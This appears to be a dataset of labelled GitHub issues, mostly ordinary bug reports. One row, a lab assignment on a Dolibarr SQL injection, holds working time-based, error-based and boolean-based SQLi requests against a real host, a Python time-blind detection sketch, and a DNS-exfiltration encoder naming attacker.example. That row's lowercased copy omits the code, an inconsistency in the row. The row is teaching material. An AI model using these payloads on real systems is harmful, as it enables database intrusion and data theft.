- Dolibarr ERP & CRM — це сучасний програмний пакет, який допомагає керувати діяльністю вашої організації (контакти, постачальники, рахунки-фактури, замовлення, запаси, порядок денний…). Це пакет програмного забезпечення з відкритим кодом, призначений для малих, середніх і великих компаній, фондів і фрілансерів.
# Запитання №2
### Запитання
Опишіть знайдену вразливість, переклавшу на українську розділ Description.
### Відповідь
Атаки SQL-ін’єкції можуть призвести до несанкціонованого доступу до конфіденційних даних, таких як паролі, дані кредитної картки або особиста інформація користувача. Багато резонансних витоків даних за останні роки були результатом атак SQL-ін’єкцій, що призвело до шкоди репутації та регуляторних штрафів. У деяких випадках зловмисник може отримати постійний бекдор до систем організації, що призведе до довгострокового злому, який може залишатися непоміченим протягом тривалого періоду. Це вражає лише 16.0.1 та 16.0.2. 16.0.0 або нижче та 16.0.3 або вище не уражені.
# Question 3
### Question
Provide fragments of vulnerable program code examples, based on the References to Advisories, Solutions, and Tools section.
### Answer
Time-based blind SQL injection
GET /search.php?s=%27)%20AND%20(SELECT%209569%20FROM%20(SELECT(SLEEP(10)))jsCH)--%20gYso HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Error-based SQL injection
GET /search.php?s=')+AND+EXTRACTVALUE(5960,CONCAT(0x5c,0x7171626271,(SELECT+(ELT(5960%3d5960,1))),0x7171766b71))--+Vmlg HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Boolean-based blind SQL injection
GET /search.php?s=3893')+OR+9606%3d9606--+aLaa HTTP/2
Host: www.dolibarr.org
Cookie: _ga_KYYDR4YR7J=GS1.1.1668795290.1.0.1668795290.0.0.0; _ga=GA1.1.1344367550.1668795290
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
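The three requests above differ only in the payload injected into the `s` parameter. As an illustrative sketch of how the time-based variant is confirmed (the target URL, payload shape, and threshold below are assumptions for the example, not taken from the advisory), one can compare response latency with and without a `SLEEP()` payload:

```python
import time
import urllib.parse
import urllib.request


def build_sleep_payload(base_url: str, delay: int) -> str:
    """URL-encode a MySQL SLEEP() payload onto the vulnerable parameter."""
    injected = f"') AND (SELECT 1 FROM (SELECT SLEEP({delay}))x)-- -"
    return base_url + urllib.parse.quote(injected)


def request_duration(url: str) -> float:
    """Wall-clock time of a single GET request, in seconds."""
    start = time.monotonic()
    try:
        urllib.request.urlopen(url, timeout=30).read()
    except Exception:
        pass  # only the elapsed time matters for this check
    return time.monotonic() - start


def looks_time_blind(base_url: str, delay: int = 10) -> bool:
    """True if the SLEEP payload responds at least ~delay seconds slower."""
    benign = base_url + urllib.parse.quote("test")
    diff = request_duration(build_sleep_payload(base_url, delay)) - request_duration(benign)
    return diff >= delay * 0.8  # 20% slack for network jitter (assumed threshold)
```

Tools such as sqlmap automate this comparison and additionally model normal response-time jitter before declaring the parameter injectable.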
# Question 4 (3 points)
### Question
Table 2 lists URL links to scientific publications related to SQL injection.
Considering the publication whose number matches your lab work variant number, translate the indicated sections into Ukrainian.
### Answer
#### 8 Prevention advice
To avoid the attacks described in this paper, preventing SQLi flaws should have the highest priority. The safest preventive measure is considered to be the use of prepared statements [18]. Prepared statements guarantee that attackers cannot change the intent of a query even if other SQL commands are inserted [19].
Various sanitization mechanisms, such as magic_quotes() and addslashes(), cannot fully prevent the presence or exploitation of an SQLi vulnerability, since certain techniques used in combination with environmental conditions can still allow attackers to exploit it [20][21]. Instead, if prepared statements are not used, it is recommended to validate input by rejecting malformed input rather than escaping or modifying it [22].
An administrator should always be prepared for unauthorized access to the underlying database. A good countermeasure is to restrict database access to the least privileges. Any granted privilege should thus be given to the least amount of code necessary, for the shortest period of time required to do the job [23]. Following this principle, users should only have access to the information and resources that are strictly necessary.
As a final step, to successfully mitigate possible DNS exfiltration attacks, the administrator should make sure that the execution of all unnecessary system routines is restricted. Failing everything else, attackers should not be able to run those that can trigger DNS requests.
Some work has been done in the area of detecting malicious activity in DNS traffic [25][26], but, mostly due to the lack of practical and mainstream solutions, it will not be specifically discussed here.
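The prepared-statement recommendation above can be illustrated with a short sketch (the table, column, and payload are hypothetical, and SQLite stands in for any SQL backend): bound parameters are transmitted as data, so an injected `' OR '1'='1` fragment cannot rewrite the intent of the query.

```python
import sqlite3

# In-memory database with a hypothetical users table for the demo.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")

malicious = "x' OR '1'='1"

# Vulnerable: string concatenation lets the payload rewrite the WHERE clause.
vulnerable = conn.execute(
    "SELECT secret FROM users WHERE name = '" + malicious + "'"
).fetchall()

# Safe: the parameterized query treats the entire payload as a literal name.
safe = conn.execute(
    "SELECT secret FROM users WHERE name = ?", (malicious,)
).fetchall()

print(vulnerable)  # leaks the row: [('s3cret',)]
print(safe)        # no match: []
```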
#### 9 Conclusion
This paper has shown how attackers can use the DNS exfiltration technique to significantly speed up data retrieval when only relatively slow SQLi methods can be used. In addition, the number of requests required against the vulnerable web server is drastically reduced, which makes the attack less noisy.
Because it requires control over a domain name server, it will probably not be used by most attackers. From the implementation point of view everything was straightforward, so its practical value cannot be ignored. The support implemented inside sqlmap should make it publicly available to everyone for further research.
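The DNS exfiltration technique referred to in the conclusion works by smuggling query results into the hostname of a lookup against an attacker-controlled domain, so the attacker's name server receives the data in its query log. A minimal sketch of the encoding step (the domain `attacker.example` is a placeholder; the label and name length limits follow RFC 1035):

```python
def encode_for_dns(data: str, attacker_domain: str = "attacker.example") -> str:
    """Hex-encode extracted data and chunk it into DNS-safe subdomain labels.

    DNS limits each label to 63 bytes and the full name to 253 bytes
    (RFC 1035), so binary-safe hex encoding plus chunking is used.
    """
    hex_data = data.encode().hex()
    labels = [hex_data[i:i + 63] for i in range(0, len(hex_data), 63)]
    return ".".join(labels + [attacker_domain])


def decode_from_dns(name: str, attacker_domain: str = "attacker.example") -> str:
    """What the attacker's name server does with the logged query name."""
    hex_data = name.removesuffix("." + attacker_domain).replace(".", "")
    return bytes.fromhex(hex_data).decode()
```

On MySQL under Windows, for instance, resolving such a name can be triggered by passing a UNC path to `LOAD_FILE()`; sqlmap's `--dns-domain` option implements this end to end.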
|
non_defect
|
запитання № запитання опишіть пз в якому знайдено вразливість назва пз url посилання в інтернеті знайти через пошукову систему призначення пз та приклади споживачів які можуть бути зацікавлені у використанні пз відповідь dolibarr dolibarr erp crm — це сучасний програмний пакет який допомагає керувати діяльністю вашої організації контакти постачальники рахунки фактури замовлення запаси порядок денний… це пакет програмного забезпечення з відкритим кодом призначений для малих середніх і великих компаній фондів і фрілансерів запитання № запитання опишіть знайдену вразливість переклавшу на українську розділ description відповідь атаки sql ін’єкції можуть призвести до несанкціонованого доступу до конфіденційних даних таких як паролі дані кредитної картки або особиста інформація користувача багато резонансних витоків даних за останні роки були результатом атак sql ін’єкцій що призвело до шкоди репутації та регуляторних штрафів у деяких випадках зловмисник може отримати постійний бекдор до систем організації що призведе до довгострокового злому який може залишатися непоміченим протягом тривалого періоду це вражає лише та або нижче та або вище не уражені запитання № запитання наведіть фрагменти прикладів уразливого програмного коду розглянувши розділ references to advisories solutions and tools відповідь часова сліпа sql ін єкція get search php s select select sleep jsch http host cookie ga ga user agent mozilla windows nt rv gecko firefox accept text html application xhtml xml application xml q image avif image webp q accept language en gb en q accept encoding gzip deflate upgrade insecure requests sec fetch dest document sec fetch mode navigate sec fetch site none sec fetch user te trailers sql ін єкція на основі аналізу помилок get search php s and extractvalue concat select elt vmlg http host cookie ga ga user agent mozilla windows nt rv gecko firefox accept text html application xhtml xml application xml q image avif image webp q accept language en gb en q accept 
encoding gzip deflate upgrade insecure requests sec fetch dest document sec fetch mode navigate sec fetch site none sec fetch user te trailers логічна сліпа sql ін єкція get search php s or alaa http host cookie ga ga user agent mozilla windows nt rv gecko firefox accept text html application xhtml xml application xml q image avif image webp q accept language en gb en q accept encoding gzip deflate upgrade insecure requests sec fetch dest document sec fetch mode navigate sec fetch site none sec fetch user te trailers запитання № бали запитання в таблиці наведено url посилання на наукові публікації пов’язані з sql injection розглянувши приклад публікації номер якої співпадає з номером вашого варіанту виконання лабораторних робіт перекладіть української вказані назви розділи відповідь поради щодо профілактики щоб уникнути атак описаних у цьому документі запобігання недолікам sqli має мати найвищий пріоритет найбезпечнішим запобіжним заходом вважається використання готових заяв підготовлені оператори гарантують що зловмисники не зможуть змінити мету запиту навіть якщо вставляються інші команди sql різноманітні механізми очищення такі як magic quotes і addslashes не можуть повністю запобігти наявності або використанню вразливості sqli оскільки певні методи які використовуються в поєднанні з умовами середовища можуть дозволити зловмисникам використовувати вразливість натомість якщо підготовлені оператори не використовуються рекомендується використовувати перевірку введення з відхиленням неправильного введення а не екрануванням або зміною адміністратор повинен завжди бути готовим до несанкціонованого доступу до основної бази даних хорошим контрзаходом є обмеження доступу до бази даних до найменших привілеїв таким чином будь який наданий привілей повинен бути наданий найменшій кількості коду необхідного для найкоротшого періоду часу необхідного для виконання роботи дотримуючись цього принципу користувачі повинні мати доступ лише до тієї інформації та ресурсів які є 
абсолютно необхідними в якості останнього кроку для успішного пом’якшення можливих атак екстракції dns адміністратор повинен переконатися що виконання всіх непотрібних системних підпрограм обмежено якщо все не вдається зловмисники не повинні мати змоги запустити ті які можуть спровокувати запити dns була проведена певна робота в області виявлення шкідливих дій у dns трафіку але здебільшого через відсутність практичних і основних рішень вони не будуть спеціально згадуватися тут висновок у цьому документі було показано як зловмисники можуть використовувати техніку ексфільтрації dns щоб значно прискорити пошук даних коли можна використовувати лише відносно повільні методи sqli крім того різко зменшено кількість необхідних запитів до вразливого веб сервера що робить його менш шумним через вимогу контролю над сервером доменних імен він ймовірно не буде використовуватися більшістю зловмисників з точки зору впровадження все було просто тому не можна ігнорувати його практичну цінність реалізована підтримка всередині sqlmap повинна зробити його загальнодоступним для всіх для подальших досліджень
| 0
|
56,780
| 15,366,102,618
|
IssuesEvent
|
2021-03-02 00:46:07
|
allanweinert/projetoBar
|
https://api.github.com/repos/allanweinert/projetoBar
|
opened
|
Stock movement - Cancel button keeps the last card used
|
Defect
|
After starting to add a record, without completing it, and then clicking cancel, the system keeps the last card used and does not bring the screen back to the initial state as it should.



|
1.0
|
Stock movement - Cancel button keeps the last card used - After starting to add a record, without completing it, and then clicking cancel, the system keeps the last card used and does not bring the screen back to the initial state as it should.



|
defect
|
movimentação de estoque botão cancelar mantém ultimo card utilizado após iniciar a inclusão de um cadastro sem finaliza lo e posteriormente clicar em cancelar o sistema mantém o último card utilizado e não trás a tela ao estado inicial que deveria
| 1
|
59,656
| 17,023,193,226
|
IssuesEvent
|
2021-07-03 00:47:53
|
tomhughes/trac-tickets
|
https://api.github.com/repos/tomhughes/trac-tickets
|
closed
|
waterway=stream rendering
|
Component: osmarender Priority: major Resolution: fixed Type: defect
|
**[Submitted to the original trac issue database at 11.02pm, Monday, 24th December 2007]**
The render result for a stream is inconsistent on different zoom levels. On at least z12 the color is off. On z13 the line is wider than on z14 (it should be the other way around). Personally, I prefer the width at z14 as it matches the width of the streams I have traced. It should be even thinner on z13, z12...
Unless that suggested width feature is implemented.
|
1.0
|
waterway=stream rendering - **[Submitted to the original trac issue database at 11.02pm, Monday, 24th December 2007]**
The render result for a stream is inconsistent on different zoom levels. On at least z12 the color is off. On z13 the line is wider than on z14 (it should be the other way around). Personally, I prefer the width at z14 as it matches the width of the streams I have traced. It should be even thinner on z13, z12...
Unless that suggested width feature is implemented.
|
defect
|
waterway stream rendering the render result for a stream is inconsistent on different zoom levels on at least the color is off on the line is wider than on it should be the other way around personally i prefer the width at as it s matches the width of the streams i have traced it should be even thinner on unless that suggested width feature is implemented
| 1
|
17,105
| 2,974,598,069
|
IssuesEvent
|
2015-07-15 02:13:31
|
Reimashi/jotai
|
https://api.github.com/repos/Reimashi/jotai
|
closed
|
Add Feature to Allow User to Specify "Significant Number" and/or "Decimal Places" Reporting of Parameters
|
auto-migrated Priority-Medium Type-Defect
|
```
What is the expected output? What do you see instead?
The output shows basically raw data, which are often reported to absolutely
ridiculous number of places / decimal places.
For the most part, the numbers reported for temperatures, voltages, fan RPMs,
etc aren't accurate to more than 2 or 3 numbers, never mind 3 decimal places.
For example, reporting a temperature to XX.X decimals is ridiculous when the
temperature reporting accuracy is +/- 5 degree C (that's NOT 0.5C...it's 5C)and
significant latencies are also involved.
Similarly for voltages that report to XX.XXX decimals when at BEST the actual
measurement accuracy is +/- 0.1V on many motherboards.
Same thing for fan RPMs that are reported to an instantaneous XXXX RPM when the
meaningful accuracy is +/- 100 RPM. So instead of "busying up" the screen with
changing numbers everytime the RPM changes by 1 or even 10 RPM, let the user
specify he's only interested when the RPM changes by 100 or more...e.g. CPU
Fan= XX00 or X00 RPM
Let the user specify how many numbers he considers valid (or worth reporting)
for a given parameter.
What version of the product are you using? On what operating system?
0.3.2beta
WinXP (32 and 64bit)
Please provide any additional information below.
N/A
Please attach a Report created with "File / Save Report..."
N/A
```
Original issue reported on code.google.com by `transgen...@gmail.com` on 12 Sep 2011 at 5:37
|
1.0
|
Add Feature to Allow User to Specify "Significant Number" and/or "Decimal Places" Reporting of Parameters - ```
What is the expected output? What do you see instead?
The output shows basically raw data, which are often reported to absolutely
ridiculous number of places / decimal places.
For the most part, the numbers reported for temperatures, voltages, fan RPMs,
etc aren't accurate to more than 2 or 3 numbers, never mind 3 decimal places.
For example, reporting a temperature to XX.X decimals is ridiculous when the
temperature reporting accuracy is +/- 5 degree C (that's NOT 0.5C...it's 5C)and
significant latencies are also involved.
Similarly for voltages that report to XX.XXX decimals when at BEST the actual
measurement accuracy is +/- 0.1V on many motherboards.
Same thing for fan RPMs that are reported to an instantaneous XXXX RPM when the
meaningful accuracy is +/- 100 RPM. So instead of "busying up" the screen with
changing numbers everytime the RPM changes by 1 or even 10 RPM, let the user
specify he's only interested when the RPM changes by 100 or more...e.g. CPU
Fan= XX00 or X00 RPM
Let the user specify how many numbers he considers valid (or worth reporting)
for a given parameter.
What version of the product are you using? On what operating system?
0.3.2beta
WinXP (32 and 64bit)
Please provide any additional information below.
N/A
Please attach a Report created with "File / Save Report..."
N/A
```
Original issue reported on code.google.com by `transgen...@gmail.com` on 12 Sep 2011 at 5:37
|
defect
|
add feature to allow user to specify significant number and or decimal places reporting of parameters what is the expected output what do you see instead the output shows basically raw data which are often reported to absolutely ridiculous number of places decimal places for the most part the numbers reported for temperatures voltages fan rpms etc aren t accurate to more than or numbers never mind decimal places for example reporting a temperature to xx x decimals is ridiculous when the temperature reporting accuracy is degree c that s not it s and significant latencies are also involved similarly for voltages that report to xx xxx decimals when at best the actual measurement accuracy is on many motherboards same thing for fan rpms that are reported to an instantaneous xxxx rpm when the meaningful accuracy is rpm so instead of busying up the screen with changing numbers everytime the rpm changes by or even rpm let the user specify he s only interested when the rpm changes by or more e g cpu fan or rpm let the user specify how many numbers he considers valid or worth reporting for a given parameter what version of the product are you using on what operating system winxp and please provide any additional information below n a please attach a report created with file save report n a original issue reported on code google com by transgen gmail com on sep at
| 1
|
419,664
| 28,150,085,711
|
IssuesEvent
|
2023-04-02 23:09:40
|
johndpjr/AgTern
|
https://api.github.com/repos/johndpjr/AgTern
|
opened
|
Create scraping process diagram
|
documentation
|
### Context
The code will get incredibly convoluted if we don't have a central place to document our scraping process. If we want it to scale, use multiple scrapers at a time, and update internships on a regular basis efficiently, we'll need to spell out the steps.
### TODO
- [ ] Create a process diagram for the scraper
- [ ] Share the process diagram over Discord
- [ ] Add this process to the wiki
### Notes
|
1.0
|
Create scraping process diagram - ### Context
The code will get incredibly convoluted if we don't have a central place to document our scraping process. If we want it to scale, use multiple scrapers at a time, and update internships on a regular basis efficiently, we'll need to spell out the steps.
### TODO
- [ ] Create a process diagram for the scraper
- [ ] Share the process diagram over Discord
- [ ] Add this process to the wiki
### Notes
|
non_defect
|
create scraping process diagram context the code will get incredibly convoluted if we don t have a central place to document our scraping process if we want it to scale use multiple scrapers at a time and update internships on a regular basis efficiently we ll need to spell out the steps todo create a process diagram for the scraper share the process diagram over discord add this process to the wiki notes
| 0
|
55,881
| 14,739,321,561
|
IssuesEvent
|
2021-01-07 06:58:02
|
primefaces/primefaces
|
https://api.github.com/repos/primefaces/primefaces
|
opened
|
jQuery UI Touch Punch 1.0.5: XSS Issue
|
defect
|
Hi,
We had penetration testing done on our application using Primefaces 8.0 and got this finding:
>jQuery UI Touch Punch 1.0.5
>URL: .../javax.faces.resource/jquery/jquery-plugins.js
>
>NODEJS:328 Cross-Site Scripting (XSS) -> https://vulners.com/nodejs/NODEJS:328
>NODEJS:329 Cross-Site Scripting -> https://vulners.com/nodejs/NODEJS:329
>NODEJS:330 Denial of Service -> https://vulners.com/nodejs/NODEJS:330
It looks like that the jQuery UI Touch Punch Plugin is not maintained. Last commit is of 2014, website is down:
https://github.com/furf/jquery-ui-touch-punch
http://touchpunch.furf.com/
But there is a new fork with commits of 2019 and 2020:
https://github.com/RWAP/jquery-ui-touch-punch
Maybe Primefaces should change to this new fork?
|
1.0
|
jQuery UI Touch Punch 1.0.5: XSS Issue - Hi,
We had penetration testing done on our application using Primefaces 8.0 and got this finding:
>jQuery UI Touch Punch 1.0.5
>URL: .../javax.faces.resource/jquery/jquery-plugins.js
>
>NODEJS:328 Cross-Site Scripting (XSS) -> https://vulners.com/nodejs/NODEJS:328
>NODEJS:329 Cross-Site Scripting -> https://vulners.com/nodejs/NODEJS:329
>NODEJS:330 Denial of Service -> https://vulners.com/nodejs/NODEJS:330
It looks like that the jQuery UI Touch Punch Plugin is not maintained. Last commit is of 2014, website is down:
https://github.com/furf/jquery-ui-touch-punch
http://touchpunch.furf.com/
But there is a new fork with commits of 2019 and 2020:
https://github.com/RWAP/jquery-ui-touch-punch
Maybe Primefaces should change to this new fork?
|
defect
|
jquery ui touch punch xss issue hi we had a penetration testing of our application using primefaces and got this finding jquery ui touch punch url javax faces resource jquery jquery plugins js nodejs cross site scripting xss nodejs cross site scripting nodejs denial of service it looks like that the jquery ui touch punch plugin is not maintained last commit is of website is down but there is a new fork with commits of and maybe primefaces should change to this new fork
| 1
|
32,069
| 6,700,438,252
|
IssuesEvent
|
2017-10-11 04:47:48
|
jwwolfe/innsystems
|
https://api.github.com/repos/jwwolfe/innsystems
|
closed
|
Incomplete GUIs
|
auto-migrated Component-UI Performance Priority-Critical Type-Defect Usability
|
```
The controller/client GUIs are not in a finished state. The controller is
more complete than the client, which needs major work, but both are in a
state of chaos. The controller needs to have the best particle, position, and
other information displayed, and the buttons need to be set up so they work.
The client is almost totally unfinished. The buttons need to be assigned
functions and the entire look needs to be streamlined and cleaned up. It
needs to be able to pull out information such as the current particle epoch
number or the number of data sets already run. This information needs to be
pulled out of the program and displayed in the GUI in an effective manner
that does not tie up the main GUI thread for too long.
```
Original issue reported on code.google.com by `darkbird44@gmail.com` on 26 Mar 2007 at 4:50
|
1.0
|
Incomplete GUIs - ```
The controller/client GUIs are not in a finished state. The controller is
more complete than the client, which needs major work, but both are in a
state of chaos. The controller needs to have the best particle, position, and
other information displayed, and the buttons need to be set up so they work.
The client is almost totally unfinished. The buttons need to be assigned
functions and the entire look needs to be streamlined and cleaned up. It
needs to be able to pull out information such as the current particle epoch
number or the number of data sets already run. This information needs to be
pulled out of the program and displayed in the GUI in an effective manner
that does not tie up the main GUI thread for too long.
```
Original issue reported on code.google.com by `darkbird44@gmail.com` on 26 Mar 2007 at 4:50
|
defect
|
incomplete guis the controller client guis are not in a finished state the controller is more complete then the client which needs major work but both are in a state of chaos the controller needs to have best particle position and other information being displayed and the buttons needs to be set so they work the client is almost totally unfinished the buttons need to be assigned functions and the entire look needs to be streamlined and cleaned up it needs to be able to pull out the information such a current particle epoch number or the number of data sets already run this information needs to be pulled out of the program and displayed in the gui in an effective manner that does not tie up the main gui thread for too long original issue reported on code google com by gmail com on mar at
| 1
|
72,062
| 23,912,764,368
|
IssuesEvent
|
2022-09-09 09:45:11
|
primefaces/primeng
|
https://api.github.com/repos/primefaces/primeng
|
opened
|
Flag country from MenuItem
|
defect
|
### Describe the bug
I want to add a country flag on the MenuItem for each country.
```
{
id: 'langId',
label: this.translate.instant('language'),
icon: 'pi pi-flag',
items: [
{
label: 'English',
command: () => this.i18nService.language = 'en',
},
{
label: 'Italiano',
command: () => this.i18nService.language = 'it',
}
]
},
```
### Environment
Windows 10, Chrom
### Reproducer
_No response_
### Angular version
14.2.1
### PrimeNG version
14.0.1
### Build / Runtime
Angular CLI App
### Language
ALL
### Node version (for AoT issues node --version)
16.14.2
### Browser(s)
All
### Steps to reproduce the behavior
_No response_
### Expected behavior
Where and how can I find the country icons to add?
No HTML or inline solutions.
|
1.0
|
Flag country from MenuItem - ### Describe the bug
I want to add a country flag on the MenuItem for each country.
```
{
id: 'langId',
label: this.translate.instant('language'),
icon: 'pi pi-flag',
items: [
{
label: 'English',
command: () => this.i18nService.language = 'en',
},
{
label: 'Italiano',
command: () => this.i18nService.language = 'it',
}
]
},
```
### Environment
Windows 10, Chrom
### Reproducer
_No response_
### Angular version
14.2.1
### PrimeNG version
14.0.1
### Build / Runtime
Angular CLI App
### Language
ALL
### Node version (for AoT issues node --version)
16.14.2
### Browser(s)
All
### Steps to reproduce the behavior
_No response_
### Expected behavior
Where and how can I find the country icons to add?
No HTML or inline solutions.
|
defect
|
flag country from menuimte describe the bug i want too add flag country on menuitem for each countries id langid label this translate instant language icon pi pi flag items label english command this language en label italiano command this language it environment windows chrom reproducer no response angular version primeng version build runtime angular cli app language all node version for aot issues node version browser s all steps to reproduce the behavior no response expected behavior where and how can i find the countris icon to add no html and inline solutions
| 1
|
242,984
| 20,329,405,157
|
IssuesEvent
|
2022-02-18 09:15:05
|
WPChill/modula-lite
|
https://api.github.com/repos/WPChill/modula-lite
|
closed
|
Sanitize mobile_gutter input
|
bug need testing
|
**Describe the bug**
A person can add anything there. Maybe also add a maximum amount you can have there.
**To Reproduce**
Add a mobile number in the mobile_gutter and save.
**Expected behavior**
Add a telephone number and when saving you should have a refreshed amount.
**Screenshots**

<!-- You can check these boxes once you've created the issue. -->
* Which addons do you have installed:
- [ ] Modula PRO
- [ ] Albums
- [ ] Slider
- [ ] Lightbox Slideshow
- [ ] Password Protect
- [ ] Watermark
- [ ] Deeplink
- [ ] Right-Click Protection
- [ ] Advanced Shortcode
- [ ] SpeedUp
- [ ] Video
<!-- You can check these boxes once you've created the issue. -->
* Which browser is affected (or browsers):
- [ ] Chrome
- [ ] Firefox
- [ ] Safari
- [ ] Other <!-- please specify -->
<!-- You can check these boxes once you've created the issue. -->
* Which device is affected (or devices):
- [ ] Desktop
- [ ] Tablet
- [ ] Mobile
- [ ] Other <!-- please specify -->
#### Used versions
* WordPress version:
* Modula Lite version:
* Modula PRO version: -
* Albums version: -
* Slider version: -
* Lightbox Slideshow version: -
* Password Protect version: -
* Watermark version: -
* Deeplink version: -
* Right-Click Protection version: -
* Advanced Shortcode version: -
* SpeedUp version: -
* Video version: -
|
1.0
|
Sanitize mobile_gutter input - **Describe the bug**
A person can add anything there. Maybe also add a maximum amount you can have there.
**To Reproduce**
Add a mobile number in the mobile_gutter and save.
**Expected behavior**
Add a telephone number and when saving you should have a refreshed amount.
**Screenshots**

<!-- You can check these boxes once you've created the issue. -->
* Which addons do you have installed:
- [ ] Modula PRO
- [ ] Albums
- [ ] Slider
- [ ] Lightbox Slideshow
- [ ] Password Protect
- [ ] Watermark
- [ ] Deeplink
- [ ] Right-Click Protection
- [ ] Advanced Shortcode
- [ ] SpeedUp
- [ ] Video
<!-- You can check these boxes once you've created the issue. -->
* Which browser is affected (or browsers):
- [ ] Chrome
- [ ] Firefox
- [ ] Safari
- [ ] Other <!-- please specify -->
<!-- You can check these boxes once you've created the issue. -->
* Which device is affected (or devices):
- [ ] Desktop
- [ ] Tablet
- [ ] Mobile
- [ ] Other <!-- please specify -->
#### Used versions
* WordPress version:
* Modula Lite version:
* Modula PRO version: -
* Albums version: -
* Slider version: -
* Lightbox Slideshow version: -
* Password Protect version: -
* Watermark version: -
* Deeplink version: -
* Right-Click Protection version: -
* Advanced Shortcode version: -
* SpeedUp version: -
* Video version: -
|
non_defect
|
sanitize mobile gutter input describe the bug a person can add whatever there maybe add a maximum ammount you can have there also to reproduce add a mobile number in the mobile gutter and save expected behavior add a telephone number and when saving you should have a refreshed ammount screenshots which addons do you have installed modula pro albums slider lightbox slideshow password protect watermark deeplink right click protection advanced shortcode speedup video which browser is affected or browsers chrome firefox safari other which device is affected or devices desktop tablet mobile other used versions wordpress version modula lite version modula pro version albums version slider version lightbox slideshow version password protect version watermark version deeplink version right click protection version advanced shortcode version speedup version video version
| 0
|